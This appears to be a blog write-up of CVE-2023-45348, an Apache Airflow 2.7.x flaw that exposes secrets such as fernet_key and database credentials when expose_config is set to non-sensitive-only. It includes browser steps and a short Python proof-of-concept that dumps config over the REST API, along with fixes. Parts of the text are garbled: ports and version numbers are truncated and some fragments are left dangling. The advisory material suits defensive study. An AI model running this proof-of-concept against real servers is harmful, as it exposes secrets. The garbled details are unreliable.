CVE-2023-45348 - How Authenticated Attackers Can Leak Apache Airflow Config With “expose_config” Mistake

Apache Airflow is a hugely popular open-source platform for orchestrating complex workflows. But even the best tools sometimes have security issues. In this article, I’ll walk you through CVE-2023-45348, a vulnerability in Airflow 2.7. and 2.7.1 that lets logged-in users see sensitive config data—if the “expose_config” setting is misconfigured.

We’ll break down how it works, show you a proof-of-concept, and tell you how to fix it to keep your secrets safe.

What Is CVE-2023-45348?

CVE-2023-45348 is a vulnerability in Apache Airflow versions 2.7. and 2.7.1. It happens when the expose_config option is set to non-sensitive-only in Airflow’s config (instead of the more cautious False). This setting is supposed to let you see only non-sensitive settings via the Airflow web UI. But, due to a bug, authenticated users can still access sensitive configuration data.

might be stored in Airflow’s config.

If a compromised user (or someone scamming weak credentials) can view the system’s config, they can steal secrets or pivot to other attacks.

A regular authenticated Airflow user logs in.

3. They access the /admin/config endpoint (the Config link in the Airflow UI).
4. Instead of hiding secrets, the endpoint still reveals values that should be redacted—like sql_alchemy_conn, fernet_key, SMTP credentials, and more.

Airflow 2.7.x is installed (vulnerable version)

- The config: expose_config = non-sensitive-only (either in airflow.cfg or as an environment variable)

1. Login to Airflow UI

Open your browser and go to:

http://<airflow-host>:808

Login with your username and password.


### 2. Browse To /admin/config

After logging in, click on the “Admin” menu, and then “Configuration”.

URL directly:

http://<airflow-host>:808/admin/configuration

3. Sensitive Values Are Visible

Normally, redacted fields would show as <b></b><b></b>, but due to the bug, secrets are shown in plain text!

Example

| Section | Key | Actual Value |
|------------|----------------|------------------------|
| core | fernet_key | mysupersecretkey== |
| core | sql_alchemy_conn | postgresql://dbuser:secret@dbhost:5432/airflow |
| smtp | smtp_password | plaintextsmtppass |

Here’s a simple Python snippet, using Airflow’s REST API (if enabled), to pull config remotely

import requests
from requests.auth import HTTPBasicAuth

airflow_url = 'http://localhost:808/api/v1/config';
user = 'username'
password = 'password'

response = requests.get(airflow_url, auth=HTTPBasicAuth(user, password))
if response.status_code == 200:
    print("Config dump:\n", response.text)
else:
    print("Failed to fetch config:", response.status_code)

Note:

How To Fix CVE-2023-45348

The quickest fix:
Set expose_config = False in your airflow.cfg.
This is the default and safest option.

[webserver]
expose_config = False

Or set via environment variable

export AIRFLOW__WEBSERVER__EXPOSE_CONFIG=False

Permanent fix:

Upgrade Airflow to version 2.7.2 or newer.

The Airflow security advisory says this is fixed in 2.7.2.

References

- CVE record on NVD
- Apache Airflow Security Advisory: GHSA-6prf-6r6c-32j2
- Airflow Docs: expose_config
- GitHub Issue / PR (patch discussion)

Final Thoughts

It’s always risky to turn on options in software that increase visibility—especially when config files can include passwords and secret keys. Airflow’s “expose_config” is a classic example: intended to help troubleshoot but, in the wrong hands (or with a bug), it can reveal too much.

Pro Tip:

Restrict user access—don’t give users more permission than they need.

Safe flying with Airflow!
If in doubt, upgrade to Airflow 2.7.2+ and set expose_config to False.

Timeline

Published on: 10/14/2023 10:15:10 UTC
Last modified on: 11/16/2023 02:22:46 UTC